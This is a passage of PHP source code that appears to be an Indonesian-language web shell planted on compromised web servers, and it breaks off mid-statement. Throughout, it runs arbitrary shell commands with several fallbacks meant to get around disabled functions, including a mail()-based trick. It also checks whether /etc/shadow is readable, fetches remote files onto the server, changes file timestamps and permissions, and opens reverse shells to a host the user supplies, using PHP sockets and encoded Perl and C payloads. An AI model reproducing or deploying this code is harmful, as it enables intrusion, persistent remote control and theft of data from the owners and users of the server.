'cPanel', '/usr/local/hpanel' => 'hPanel (Hostinger)', '/usr/local/psa' => 'Plesk', '/usr/local/webuzo' => 'Webuzo', '/usr/local/vesta' => 'Vesta CP', '/usr/share/webmin' => 'Virtualmin', '/www/server/panel' => 'aaPanel', '/opt/neoistone' => 'NS Panel', '/etc/neoistone' => 'NS Panel', '/usr/local/neoistone' => 'NS Panel', '/usr/local/mgr5' => 'ISP Manager', '/usr/local/mgr6' => 'ISP Manager', '/usr/local/home/admispconfig' => 'ISP Config', '/usr/local/directadmin' => 'Direct Admin', '/usr/local/solusvm/www' => 'SolusVM', '/usr/local/lxlabs/kloxo' => 'Kloxo', '/usr/local/cwp' => 'CentOS WebPanel', '/usr/local/cwpsrv' => 'CentOS WebPanel', '/var/www/html/froxlor-latest' => 'Froxlor', '/var/www/html/froxlor' => 'Froxlor', '/etc/ajenti/' => 'Ajenti'); foreach($pn as $kpn => $vpn){ if(@is_dir($kpn)){ $npn[] = $vpn; } } return isset($npn) ? implode(', ', array_values(array_unique($npn))) : 'Unknown'; } function showInf($n, $v){ $x = ''; $v = trim($v); if($v){ $x .= '

'.$n.':

'; $x .= strpos($v, "\n") == false ? '' : ''; } return $x; } if(AvFunc(array('mysql_get_client_info'))){$temp[] = "MySQL (" . @mysql_get_client_info(). ")";} if(AvFunc(array('mysqli_get_client_info'))){$temp[] = "MySQLi (" . @mysqli_get_client_info(). ")";} if(AvFunc(array('mssql_connect'))){$temp[] = "MSSQL";} if(AvFunc(array('pg_connect'))){$temp[] = "PostgreSQL";} if(AvFunc(array('oci_connect'))){$temp[] = "Oracle";} $sInfo[] = showInf('System', @php_uname()); $sInfo[] = showInf('Server software', (AvFunc(array('getenv')) ? @getenv('SERVER_SOFTWARE') : 'Unknown')); $sInfo[] = showInf('Server ip', (AvFunc(array('gethostbyname')) ? @gethostbyname($_SERVER['HTTP_HOST']) : 'Unknown')); $sInfo[] = showInf('Server panel', serverPanel()); if(AvFunc(array('ini_get'))){ $sInfo[] = showInf('Open base dir', @ini_get('open_basedir')); $sInfo[] = showInf('Safe mode', (@ini_get('safe_mode') ? 'ON' : 'OFF')); $sInfo[] = showInf('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); $sInfo[] = showInf('Safe mode include dir', @ini_get('safe_mode_include_dir')); } $sInfo[] = showInf('PHP Version', @phpversion()); $sInfo[] = showInf('Disabled PHP Functions', (count(disFunc())>0 ? implode(', ', disFunc()) : 'none')); $sInfo[] = showInf('Loaded Apache modules', (AvFunc(array('apache_get_modules')) ? implode(', ', @apache_get_modules()) : '-')); $sInfo[] = showInf('cURL support', (AvFunc(array('curl_version')) ? 'Yes ('.curl_version()['version'].')' : 'No')); $sInfo[] = showInf('Databases', (isset($temp) ? implode(', ',$temp) : 'Unknown')); if($GLOBALS['os'] == 'nix'){ $sInfo[] = showInf('OS Version', (AvFunc(array('file_get_contents')) ? @file_get_contents('/proc/version') : 'Unknown')); $sInfo[] = showInf('Distro name', (AvFunc(array('file_get_contents')) ? @file_get_contents('/etc/issue.net') : 'Unknown')); if(AvFunc(array('is_readable'))){ $sInfo[] = showInf('Readable /etc/passwd', (@is_readable('/etc/passwd') ? "Yes" : "No")); $sInfo[] = showInf('Readable /etc/shadow', (@is_readable('/etc/shadow') ? "Yes" : "No")); } } else { $sInfo[] = showInf('OS Version', base64_decode(cmd("ver", $_SESSION['path'])['stdout'])); if(AvFunc(array('iconv'))){ $sInfo[] = showInf('Account Settings', @iconv('CP866', 'UTF-8', base64_decode(cmd("net accounts", $_SESSION['path'])['stdout']))); $sInfo[] = showInf('User Accounts', @iconv('CP866', 'UTF-8', base64_decode(cmd("net user", $_SESSION['path'])['stdout']))); $sInfo[] = showInf('System info', @iconv('CP866', 'UTF-8',base64_decode(cmd("systeminfo", $_SESSION['path'])['stdout']))); } } return array_values(array_filter(array_unique($sInfo))); } function transferFile($xurl, $xpath, $xname){ @set_time_limit(0); $fName = $xpath."/".$xname; if(is_writable($xpath)){ if(AvFunc(array('file_put_contents', 'file_get_contents'))){ if(file_exists($fName)){@unlink($fName);} $upfiles = @file_put_contents($fName, @file_get_contents($xurl)); if($upfiles){ $outs[] = file_exists($fName) ? $xname." uploaded!" : $xname." failed!"; } else { $outs[] = "handling url failed!"; } } else if(AvFunc(array('copy'))){ if(file_exists($fName)){@unlink($fName);} $outs[] = @copy($xurl, $fName) ? $xname." uploaded!" : $xname." failed!"; } else if(AvFunc(array('curl_version', 'fopen', 'fclose'))){ if(file_exists($fName)){@unlink($fName);} $ch = curl_init($xurl); $fp = @fopen($fName, 'w'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); @fclose($fp); $outs[] = file_exists($fName) ? $xname." uploaded!" : $xname." failed!"; } else { if(file_exists($fName)){@unlink($fName);} $sendreq = cmd('wget -c '.$xurl.' -O '.$xname, $xpath); $outs[] = isset($sendreq['stdout']) && strlen($sendreq['stdout'])>2 ? $xname." uploaded!" : $xname." failed!"; } } else { $outs[] = $xname.' failed!'; } return isset($outs) ? $outs : array($xname.' failed!'); } function fType($a,$c=null){ $c = !empty($c) ? $c : '2em'; switch($a){ case 'logo' : $b = 'https://clipart-library.com/data_images/554935.png'; break; case 'home' : $b = ''; break; case 'dir' : $b = ''; break; case 'php' : $b = ''; break; case 'zip' : $b = ''; break; case 'img' : $b = ''; break; case 'txt' : $b = ''; break; case 'css' : $b = ''; break; case 'js' : $b = ''; break; case 'html' : $b = ''; break; case 'other': $b = ''; break; case 'info' : $b = ''; break; case 'edit' : $b = ''; break; case 'cmd' : $b = ''; break; case 'bc' : $b = ''; break; case 'sql' : $b = ''; break; case 'out' : $b = ''; break; case 'loader': $b = ''; break; } return $b; } function encode($value,$keys) {if(!$value){return false;}$key = sha1($keys);$strLen = strlen($value);$keyLen = strlen($key);$j = 0;$crypttext = ''; for ($i = 0; $i < $strLen; $i++) {$ordStr = ord(substr($value, $i, 1));if ($j == $keyLen) {$j = 0;}$ordKey = ord(substr($key, $j, 1));$j++;$crypttext .= strrev(base_convert(dechex($ordStr + $ordKey), 16, 36));}return $crypttext;} function decode($value,$keys) {if(!$value){return false;}$key = sha1($keys);$strLen = strlen($value);$keyLen = strlen($key);$j = 0;$decrypttext = '';for ($i = 0; $i < $strLen; $i += 2) {$ordStr = hexdec(base_convert(strrev(substr($value, $i, 2)), 36, 16));if ($j == $keyLen) {$j = 0;}$ordKey = ord(substr($key, $j, 1));$j++;$decrypttext .= chr($ordStr - $ordKey);}return $decrypttext;} function generate($_a1a,$_a2a){ return $_a1a == 'encode' ? encode($_a2a,preg_replace('/[^a-zA-Z]/','',$GLOBALS['stitle'])) : decode($_a2a,preg_replace('/[^a-zA-Z]/','',$GLOBALS['stitle']));} function procopen($cmd){ $descspek = array( 1 => array("pipe", "w"), 0 => array("pipe", "r"), 2 => array("pipe", "w") ); try { if(AvFunc(array('proc_open','proc_close','fread','feof','fclose'))){ $process = @proc_open($cmd, $descspek, $pipes); if(is_resource($process)){ $stdout = ""; $buffer = ""; do { $buffer = fread($pipes[1], $GLOBALS['chunk_size']); $stdout = $stdout . $buffer; } while ((!feof($pipes[1])) && (strlen($buffer) != 0)); $stderr = ""; $buffer = ""; do { $buffer = fread($pipes[2], $GLOBALS['chunk_size']); $stderr = $stderr . $buffer; } while ((!feof($pipes[2])) && (strlen($buffer) != 0)); fclose($pipes[1]); fclose($pipes[2]); $outr = !empty($stdout) ? $stdout : $stderr; } else { $outr = 'Gagal eksekusi pak!, proc_open failed!'; } proc_close($process); } else { $outr = 'PHP proc_open function is disabled or no exists!'; } echo $outr; } catch(Exception $err){ echo 'error: '.$err->getMessage(); } } function fakemail($func, $cmd){ $tmpdir = str_replace('\\','/', @sys_get_temp_dir()); if(is_writable($tmpdir)){ $cmds = "{$cmd} > {$tmpdir}/geiss.txt"; cf($tmpdir.'/geiss.sh', base64_encode(@iconv("UTF-8", "ISO-8859-1//IGNORE", addcslashes("#!/bin/sh\n{$cmds}","\r\t\0")))); @chmod($tmpdir.'/geiss.sh', 0777); if($func == 'mail'){ $send = @mail("root@root", "", "", "", '-H \"exec '.$tmpdir.'/geiss.sh\"'); } else { $send = @mb_send_mail("root@root", "", "", "", '-H \"exec '.$tmpdir.'/geiss.sh\"'); } if($send){@file_get_contents($tmpdir."/geiss.txt");} return sleep(5); } } function cf($f,$t){ if(AvFunc(array('fopen','fwrite','fputs','fclose'))){ $w=@fopen($f,"w"); if($w){ @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)); @fclose($w); } } else { if(AvFunc(array('file_put_contents'))){ @file_put_contents($f,@base64_decode($t)); } } } function expandPath($path) { if(preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)){ cmd("echo $match[1]", $stdout); return $stdout[0] . $match[2];} return $path; } function cmd($cmdx, $path){ $stdout = ''; if(AvFunc(array('chdir'))){ if(preg_match("/^\s*cd\s*(2>&1)?$/", $cmdx)){ @chdir(expandPath("~")); } else if(preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmdx)){ @chdir($path); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmdx, $match); @chdir(expandPath($match[1])); } else { @chdir($path); $stdout = ex($cmdx); } } $cfg = array('username' => 'Z190T', 'hostname' => 'shell'); if($GLOBALS['os'] == 'nix'){ if(AvFunc(array('posix_getpwuid','posix_geteuid'))){ $pwuid = @posix_getpwuid(@posix_geteuid());if($pwuid !== false){ $cfg['username'] = $pwuid['name'];}} } else { if(AvFunc(array('getenv'))){ $username = @getenv('USERNAME');if($username !== false){ $cfg['username'] = $username;}} } if(AvFunc(array('gethostname'))){ $hostname = @gethostname(); if($hostname !== false){ $cfg['hostname'] = $hostname;}} $_SESSION['path'] = AvFunc(array('getcwd')) ? str_replace('\\','/', @getcwd()) : $_SERVER['DOCUMENT_ROOT']; return array('userhost' => base64_encode($cfg['username']."@".$cfg['hostname']), 'path' => base64_encode($_SESSION['path']), 'stdout' => base64_encode($stdout)); } function ex($init){ $out = ''; $arrCmd = array('proc_open', 'popen', 'exec', 'passthru', 'system', 'shell_exec', 'mail', 'mb_send_mail'); if(!preg_match('/2>/', $init)){$init.=' 2>&1';} $tmpout = `$init`; if(strlen($tmpout)>0){ $out = $tmpout; } else { foreach($arrCmd as $c){ if($c == 'proc_open'){ if(AvFunc(array($c, 'ob_start', 'ob_get_clean'))){ob_start(); procopen($init); $out=ob_get_clean(); break;} } else if($c == 'exec'){ if(AvFunc(array($c))){@$c($init,$outs); $out=@join("\n",$outs); break;} } else if($c == 'system' || $c == 'passthru'){ if(AvFunc(array('system', 'passthru', 'ob_start', 'ob_get_clean'))){ob_start(); @$c($init); $out=ob_get_clean(); break;} } else if($c == 'shell_exec'){ if(AvFunc(array($c))){$out=$c($init); break; } } else if($c == 'mail' || $c == 'mb_send_mail'){ if(AvFunc(array('mail', 'mb_send_mail', 'ob_start', 'ob_get_clean'))){ob_start(); fakemail("{$c}",$init); $out=ob_get_clean(); break;} } else { if(AvFunc(array($c, 'feof', 'fread', 'fclose'))){if(is_resource($f = @$c($init, "r"))){$out=''; while(!@feof($f)){$out.=fread($f, $GLOBALS['chunk_size']);}fclose($f);} break;} } } if(strlen($out)<=0){ $out = 'gak bisa jalanin perintah, coba cek disable_functions server ini!'; } } return $out; } function statusnya($file){ $stx = @fileperms($file); if(($stx & 0xC000) == 0xC000){ $info = 's'; /* Socket */ } elseif(($stx & 0xA000) == 0xA000){ $info = 'l'; /* Symbolic Link */ } elseif(($stx & 0x8000) == 0x8000){ $info = '-'; /* Regular */ } elseif(($stx & 0x6000) == 0x6000){ $info = 'b'; /* Block special */ } elseif(($stx & 0x4000) == 0x4000){ $info = 'd'; /* Directory */ } elseif(($stx & 0x2000) == 0x2000){ $info = 'c'; /* Character special */ } elseif(($stx & 0x1000) == 0x1000){ $info = 'p'; /* FIFO pipe */ } else { $info = 'u'; /* Unknown */ } /* Owner */ $info .= ($stx & 0x0100) ? 'r' : '-'; $info .= ($stx & 0x0080) ? 'w' : '-'; $info .= (($stx & 0x0040) ? (($stx & 0x0800) ? 's' : 'x' ) : (($stx & 0x0800) ? 'S' : '-')); /* Group */ $info .= ($stx & 0x0020) ? 'r' : '-'; $info .= ($stx & 0x0010) ? 'w' : '-'; $info .= (($stx & 0x0008) ? (($stx & 0x0400) ? 's' : 'x' ) : (($stx & 0x0400) ? 'S' : '-')); /* World */ $info .= ($stx & 0x0004) ? 'r' : '-'; $info .= ($stx & 0x0002) ? 'w' : '-'; $info .= (($stx & 0x0001) ? (($stx & 0x0200) ? 't' : 'x' ) : (($stx & 0x0200) ? 'T' : '-')); return $info; } function stColor($f){$colors = '';if(!@is_readable($f)){$colors = 'text-danger';} else if(!@is_writable($f)){$colors = 'text-warning';} else {$colors = 'text-success';}return $colors;} function owner($filename){ $owner = AvFunc(array('fileowner')) ? @fileowner($filename) : '?'; $group = AvFunc(array('filegroup')) ? @filegroup($filename) : '?'; if(AvFunc(array('posix_getpwuid'))){ $owner = @posix_getpwuid($owner); $owner = isset($owner['name']) ? $owner['name'] : '?'; } if(AvFunc(array('posix_getgrgid'))){ $group = @posix_getgrgid($group); $group = isset($group['name']) ? $group['name'] : '?'; } return array('owner' => $owner, 'group' => $group); } function sizeFilter($bytes){ $label = array('B', 'KB', 'MB', 'GB', 'TB', 'PB'); for($i = 0; $bytes >= 1024 && $i < ( count( $label ) -1 ); $bytes /= 1024, $i++); return(round($bytes, 2) . " " . $label[$i]); } function countDir($filename){return @count(@scandir($filename)) - 2;} function xrmdir($dir){ $items = @scandir($dir); if($items){ foreach($items as $item) { if($item === '.' || $item === '..'){ continue; } $path = $dir.'/'.$item; if(@is_dir($path)){ xrmdir($path); } else { @unlink($path); } } rmdir($dir); } } function urutberkas($a){ $b = @scandir($a); $i = array(); if(is_array($b) && count($b)>0){ foreach($b as $v){ $dir = $a.'/'.$v; if(@is_dir($dir) && !in_array($v, array('.', '..'))){ $i[] = array('type' => 'dir', 'entry' => $v, 'entry_path' => $a, 'full_path' => $dir); } else { if(!in_array($v, array('.', '..'))){ $i[] = array('type' => 'file', 'entry' => $v, 'entry_path' => $a, 'full_path'=> $dir); } } } $col1 = array_column($i, 'type'); $col2 = array_column($i, 'entry'); array_multisort($col1, SORT_ASC, $col2, SORT_ASC, $i); } return $i; } function pathberkas($a){ $lb = explode('/', $a); if(isset($lb) && count($lb)>0){ $outs = '"; } else { $outs = "gak bisa baca direktori ini gess.."; } return $outs; } function filemanager($fm){ $lokasinya = urutberkas($fm); $fmtable = "
".pathberkas($fm)."
"; $fmtable .= "
"; $fmtable .= "
"; $cDir = 0; $cFile = 0; if(count($lokasinya)>0){ foreach($lokasinya as $kl => $dir){ $owner = owner($dir['full_path']); $fSize = $dir['type'] == 'dir' ? countDir($dir['full_path']) . " items" : sizeFilter(@filesize($dir['full_path'])); if($dir['type'] == 'dir'){ $cDir += 1; $txcol = stColor($dir['full_path']); switch($txcol){ case 'text-danger' : $dlinks = "{$dir['entry']}"; break; case 'text-warning' : $dlinks = "{$dir['entry']}"; break; case 'text-success' :$dlinks = "{$dir['entry']}"; break; } $zadd = ''; if(class_exists('ZipArchive')){ $zadd .= ""; } if(!in_array($dir['entry'], array('.', '..'))){ switch($txcol){ case 'text-danger' : $formper = "".statusnya($dir['full_path']).""; $formsel = "-"; break; case 'text-warning' : $formper = "".statusnya($dir['full_path']).""; $formsel = "-"; break; case 'text-success' : $formper = "" . statusnya($dir['full_path']) . ""; $formsel = ""; break; default : $formper = statusnya($dir['full_path']); $formsel = "-"; } } else { $formper = statusnya($dir['full_path']); $formsel = ""; } $formper .= "".substr(sprintf("%o", @fileperms($dir['full_path'])),-4).""; $fmtable .= ""; } else { $cFile += 1; $fcolor = stColor($dir['full_path']); switch($fcolor){ case 'text-danger' : $flinks = "".statusnya($dir['full_path']).""; break; case 'text-warning' : $flinks = "".statusnya($dir['full_path']).""; break; case 'text-success' :$flinks = "" . statusnya($dir['full_path']) . ""; break; } $flinks .= "".substr(sprintf("%o", @fileperms($dir['full_path'])),-4).""; $ext = pathinfo($dir['full_path'], PATHINFO_EXTENSION); $zadd = ''; if(!empty($ext)){ switch(strtolower(ucwords($ext))){ case'css': case'less': $ftype = fType('css','1.5em'); break; case'txt': case'ini': $ftype = fType('txt'); break; case'js': case'json': $ftype = fType('js','1.8em'); break; case'php': case'phtml': case'php5': case'php7': case'phar': case'inc': case'module': case'hphp': case'ctp': case'hphp': $ftype = fType('php'); break; case'html': case'htm': case'shtml': case'xhtml': case'xml': $ftype = fType('html'); break; case'zip': case'rar': case'tar': case'tar.bz': case'tar.gz': $ftype = fType('zip'); break; case'jpg': case'png': case'bmp': case'gif': case'webp': case'psd': case'jpeg': case'ico': case'ai': case'xcf': case'cdr': case'tif': case'tif': case'tiff': case'eps': $ftype = fType('img'); break; default: $ftype = fType('other'); } if(class_exists('ZipArchive')){ $zadd .= ""; if($ext == 'zip'){ $zadd .= ""; } } } else { $ftype = fType('other'); } switch($fcolor){ case 'text-danger' : $fselc = "-"; break; case 'text-warning' : $fselc = ""; break; case 'text-success' : $fselc = ""; break; } $fmtable .= ""; } } } else { $fmtable .= ""; } $fmtable .= ""; $fmtable .= "
NameModifiedUser/GroupPermissionOptions
".fType('dir','1.7em')."
{$dlinks}{$fSize}
 ".date('Y-m-d H:i:s', @filemtime($dir['full_path']))." {$owner['owner']}/{$owner['group']} {$formper} {$formsel}
{$ftype}
{$dir['entry']}{$fSize}
 ".date('Y-m-d H:i:s', @filemtime($dir['full_path']))." {$owner['owner']}/{$owner['group']} {$flinks} {$fselc}
Direktori tidak berisi file apapun
Dir: {$cDir}, Files: {$cFile}
"; return $fmtable; } if(isset($_GET['act'])){ if($_GET['act'] == 'info'){ header("Content-type: application/json; charset=utf-8"); echo json_encode((object) serverSecInfo()); die(); } else if($_GET['act'] == 'command'){ if(isset($_POST['cmd'])){ if(!empty($_POST['cmd']) || strlen($_POST['cmd'])>1){ $sendreq = cmd($_POST['cmd'], $_POST['xpath']); $outs['stdout'] = base64_encode("
". @iconv("UTF-8", "ISO-8859-1//IGNORE", addcslashes("".base64_decode($sendreq['userhost']).":".base64_decode($sendreq['path'])."# {$_POST['cmd']}
".htmlspecialchars(base64_decode($sendreq['stdout']))."","\t\0"))."
"); $outs['path'] = $sendreq['path']; $outs['userhost'] = $sendreq['userhost']; } else { $outs['stdout'] = base64_encode("
Sebenernya, apa sih yang anda perintahkan?
"); $outs['path'] = base64_encode($_SESSION['path']); $outs['userhost'] = base64_encode('0'); } header("Content-type: application/json; charset=utf-8"); echo json_encode($outs); clearstatcache(); die(); } } else if($_GET['act'] == 'mkdir'){ $ndir = isset($_POST['xdir']) && !empty($_POST['xdir']) ? $_POST['xdir'] : ''; if(!empty($ndir)){ $xpath = $_POST['xpath']."/".$ndir; if($_POST['xtype'] == 'dir'){ if(!is_dir($xpath)){ if(@mkdir($xpath, 0755, true)){ $outs = "Direktori berhasil dibuat!"; } else { $sendreq = cmd("mkdir ".$xpath, $_POST['xpath']); $outs = isset($sendreq['stdout']) && strlen($sendreq['stdout'])>2 ? "Direktori berhasil dibuat!" : "Gagal membuat direktori!"; } } else { $outs = "Direktori sudah ada!"; } } else { if($_POST['xtype'] == 'file'){ if(!file_exists($xpath)){ if(AvFunc(array('fopen','fclose'))){ $fp = @fopen($xpath, 'w'); if($fp){ $xpath = "ok, tinggal di edit.."; fclose($fp); } $outs = "File berhasil dibuat!"; } else if(AvFunc(array('file_put_contents'))){ file_put_contents($xpath, ""); $outs = file_exists($xpath) ? "File berhasil dibuat!" : "Gagal membuat file!"; } } else { $outs = "File sudah ada, cobalah membuat file dengan nama yang berbeda!"; } } else { $outs = "Anda mw buat apa??"; } } } else { $outs = "Path tidak valid!"; } echo $outs; die(); } else if($_GET['act'] == 'readfile'){ if(isset($_POST['xpath']) && !empty($_POST['xpath'])){ $xpath = $_POST['xpath']; if(@is_readable($xpath)){ $outs = ''; if(@filesize($xpath)>0){ if(AvFunc(array('fopen','fread','fclose','feof'))){ $fp = @fopen($xpath, 'r'); if($fp){ while(!@feof($fp)){$outs .= htmlspecialchars(@fread($fp, @filesize($xpath)));} @fclose($fp); } } else if(AvFunc(array('file_get_contents'))){ $outs = @file_get_contents($df); } else { $outs = "File {$_GET['entry']} gak bisa dibaca!"; } } else { if(AvFunc(array('file_get_contents'))){$outs = @file_get_contents($df);} } } else { $outs = "File {$_GET['entry']} gak bisa dibaca!"; } } else { $outs = "File yang mw dibaca, gk ada!"; } echo $outs; die(); } else if($_GET['act'] == 'uploader'){ $xpath = $_POST['xpath']; $xurl = $_POST['xurl']; $xname = $_POST['xname']; if(is_writable($xpath)){ if(empty($xurl) || !filter_var($xurl, FILTER_VALIDATE_URL)){$errs[] = "Url tidak valid!";} if(empty($xname)){$errs[] = "Nama file tidak boleh kosong!";} if(isset($errs)){ $outs[] = $errs; } else { $outs = transferFile($xurl, $xpath, $xname); } } else { $outs[] = "Gak bisa upload file di direktori ini!"; } echo isset($outs) ? implode('
', $outs) : 'Invalid file!'; die(); } else if($_GET['act'] == 'upload'){ @ini_set('output_buffering', 0); $xpath = $_POST['xpath']; if(is_writable($xpath)){ for($cf=0; $cf 0){ $fname = @$_FILES['xfile']['name'][$cf]; $ftmp = @$_FILES['xfile']['tmp_name'][$cf]; if(AvFunc(array('move_uploaded_file'))){ if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);} $outs[] = @move_uploaded_file($ftmp, $xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!"; } else if(AvFunc(array('file_put_contents', 'file_get_contents'))){ if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);} $upfiles = @file_put_contents($xpath."/".$fname, @file_get_contents(@$ftmp)); if($upfiles){ $outs[] = file_exists($xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!"; } else { $outs[] = $fname." failed!"; } } else if(AvFunc(array('copy'))){ if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);} $outs[] = @copy($ftmp, $xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!"; } else { $outs[] = $fname." failed!"; } } } } else { $outs[] = "Gak bisa upload file di direktori ini!"; } echo isset($outs) ? implode('
', $outs) : 'Invalid file!'; die(); } else if($_GET['act'] == 'rename'){ if(isset($_POST['xtype'], $_POST['xpath'], $_POST['xname'], $_POST['oname'])){ $ren = @rename($_POST['xpath'].'/'.$_POST['oname'], $_POST['xpath'].'/'.$_POST['xname']); $outss = $ren == true ? 'Berhasil mengubah nama '.$_POST['xtype'] : 'Gagal mengubah nama '.$_POST['xtype']; echo $outss; die(); } } else if($_GET['act'] == 'touch'){ if(isset($_POST['xtype'], $_POST['xpath'], $_POST['xname'], $_POST['xtime'])){ $time = strtotime($_POST['xtime']); $fd = $_POST['xpath'].'/'.$_POST['xname']; if($time){ $outs = !touch($fd, $time, $time) ? 'Fail!' : 'Touched!'; } else { $outs = 'Format waktu tidak valid!'; } clearstatcache(); echo $outs; die(); } } else if($_GET['act'] == 'chmod'){ if(isset($_POST['xperm']) && !empty($_POST['xperm'])){ $xperm = $_POST['xperm']; $xtype = $_POST['xtype']; $xname = $_POST['xname']; $xpath = $_POST['xpath']; $perms = 0; for($i=strlen($xperm)-1;$i>=0;--$i){ $perms += (int)$xperm[$i]*pow(8, (strlen($xperm)-$i-1)); } $cm = @chmod("{$xpath}/{$xname}", $perms); $outss = $cm == true ? 'chmod '.$xtype.': '.$xname.', berhasil!' : 'chmod '.$xtype.': '.$xname.', gagal!'; } else { $outss = 'Permission tidak boleh kosong!'; } clearstatcache(); echo $outss; die(); } else if($_GET['act'] == 'del'){ if(isset($_POST['xtype'], $_POST['xname'], $_POST['xpath'])){ $df = $_POST['xpath'] .'/'. $_POST['xname']; if(@is_dir($df)){ xrmdir($df); $outss = file_exists($df) ? "Hapus dir gagal!" : "Hapus dir sukses!"; } else if(@is_file($df)){ @unlink($df); $outss = file_exists($df) ? "Hapus file gagal!" : "Hapus file sukses!"; } echo $outss; die(); } } else if($_GET['act'] == 'zip'){ if(class_exists('ZipArchive')){ $zip = new ZipArchive(); $df = $_POST['xpath'] .'/'. $_POST['xname']; $fnm = explode('.', $_POST['xname']); $newname = count($fnm)>0 ? $_POST['xpath']."/".current($fnm) : $df; if(file_exists($newname.'.zip')){ unlink($_POST['xpath'].'/'.$newname.'.zip'); } if($zip->open($newname.'.zip', ZipArchive::CREATE)){ if(@is_dir($df)){ $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($df.'/', FilesystemIterator::SKIP_DOTS)); foreach($files as $key => $value){ $zip->addFile(realpath($key), $key); } } else { $zip->addFile($df); } $outss = $_POST['xname'].' zipped!'; } else { $outss = 'Tidak dapat menganalisa dir/file'; } $zip->close(); } else { $outss = 'module ZipArchive tidak terinstall!'; } echo $outss; die(); } else if($_GET['act'] == 'getpma'){ $fnames = 'miniFmAdminer.php'; if(isset($_GET['del'])){ @unlink($lokasiberkas."/".$fnames); $outs = file_exists($lokasiberkas."/".$fnames) ? array('error' => 1, 'message' => 'Hapus file gagal!') : array('error' => 0, 'message' => 'Hapus file sukses!!'); } else { $outs = array('error' => 1, 'message' => 'This directory not writeable!'); if(is_writable($lokasiberkas)){ transferFile('https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-en.php', $lokasiberkas, $fnames); $outs = file_exists($lokasiberkas."/".$fnames) ? array('error' => 0, 'message' => $weburl."/".$fnames) : array('error' => 1, 'message' => 'gagal!'); } } header("Content-type: application/json; charset=utf-8"); echo json_encode($outs); die(); } else if($_GET['act'] == 'bc'){ $outs = ''; if(isset($_POST['xpath'], $_POST['bhost'], $_POST['bport'], $_POST['btype'])){ function which($p,$path){ $d = cmd('which ' . $p, $path); if(!empty($d['stdout'])){return $d['stdout'];} return false; } if($_POST['btype'] == 1){ if(AvFunc(array('fsockopen','fputs','feof','fgets','fclose'))){ $sockfd = @fsockopen($_POST['bhost'], $_POST['bport'], $errno, $errstr); $out = ""; if($errno != 0) { $out .= "{$errno} : {$errstr}"; } else if (!$sockfd) { $out .= "Unexpected error has occured, connection may have failed."; } else { fputs($sockfd, "yoshh.. Connected!\n"); while(!feof($sockfd)) { $cmdPrompt = '[$]~ '; fputs($sockfd, $cmdPrompt); $command = fgets($sockfd, $GLOBALS['chunk_size']); fputs($sockfd, "".cmd($command, $_POST['xpath'])['stdout'].""); } $out .= $sockfd; fclose($sockfd); } $outs .= $out; } else { $outs = 'reverse shell using php: failed!'; } } else if($_POST['btype'] == 2){ $tmpdir = str_replace('\\','/', @sys_get_temp_dir()); if(is_writable($tmpdir)){ $bcfile = $tmpdir."/bc.pl"; $cf = cf($bcfile, generate("decode", "cjNpMnEybjRyNGw0dTJqNWQ0ZTRuMnY1NjR6NWM0djFuMXE0MDZjNHAzdDNrNDc0czViNHM0ODM0M28xYzJiNGk1aTU1NHY1MzNwNWo0bDUwNjg0NDRtNG40aDRuMnQzOTNtM2IzNTV3MzU0eDNuMjkyeDQ5NmYybDVmNGE0azJyM2YzcTRyNHU1azR5MmEydDNuM3gzcjVjMngzNDM1MzIzbDJqNDM0YzQ3NHA0aTRuNGY0MzRxNTI0bDU0NG80MDRlNHY1bjJ0M2IzcjNmMzc1MTR4MjY0ejNhMmMyYjRpNWk1NTR2NWoybzN4NDg2bzNkNGM0NzRvMmQyZzN6NW00ZjRpNGQ0OTJ0MzkyMjRmNGYyeTM2MzYzczFoMms0ejVsNHM0bzRnNDk0NTRtNHg1dzVnNHg1aDRpNXU0dTVoNW00ODRpMm4ybjRhNHg1ajJoMnoyNDNuMTA2ZjQ5NGM0YTQxNm4yNDVwM2MzajNxNHUzczJoMno0YzN6M2YzejRuNHAzeDNhMjM1bzNuNHY0ODRxM3EzdTNjM2MzeTRvMjgyYzJ2NWo0dzVrNGw0aTJkMjk2ejRwM2E0ZTQ5NHgzZzJoM3I0eDVoNGk0MDNwM3EzYTI5NWc0cTNtMmY0NTN2MTY0aDRtNGg0YzRrNW80ZzJuM3k0ODN3NDkzdTNsMmQydDNuNGk1YTQ5NG00eTNlMjA1MTVuMzY0OTQ3NHgzbzNhM3Y1azR2NW40ZTRvM2wyYzJ5M200ZDJvMmc0dDFtMWY0djU2NHY1ZzJ0M3AzZDN1NHAzMTRlMmYyNjN2M3QzcjNnM3U0YjNvM2MyeTNkNHExejJoNHc1YTR1NXczdzNyM2EzcjNzM3YzMTRjMmEyMjN0M28zMDU3M2wzYTN0M3IzbzJnNHYxcjFqNHg1YjRtNHAyMjVxMzgzYjMzNTA1bDJsM2MyaTRqMjM1ejRnM2kzYjN3M2QybzJnNHQxbTFqNDQ2azQxNjU0ajRoMmsyNDQ5NHE1azRzMm40cDVlMnQyaTR1M2oyejJyMTMzaDVkNHM1bDRsNWwyMzU0NWgzZzNrM3AyMjN3MTMzNzRjNGY0eTU2NHgzbjN1MzkzbzM2NXYzeTM1M3UxcTFrNWk0bjRzNGs1aTJuM3EzcDRuNG4zejRqMmY0")); if($cf){ if(which('perl')){ $out = cmd("perl {$bcfile} {$_POST['bhost']} {$_POST['bport']} &", $tmpdir); $outs = $out['stdout']."\n".cmd("".generate("decode", "w5s4b234t4r4f296c274i4k5h4p32494n2l4t5")."", $tmpdir)['stdout']; } else { $outs = 'reverse shell using perl: failed!'; } } else { $outs = 'reverse shell using perl: failed!'; } } else { $outs = 'temp directory is not writeable!'; } } else if($_POST['btype'] == 3){ $tmpdir = str_replace('\\','/', @sys_get_temp_dir()); if(is_writable($tmpdir)){ $bcfile = $tmpdir."/bc.c"; $cf = cf($bcfile, generate("decode", 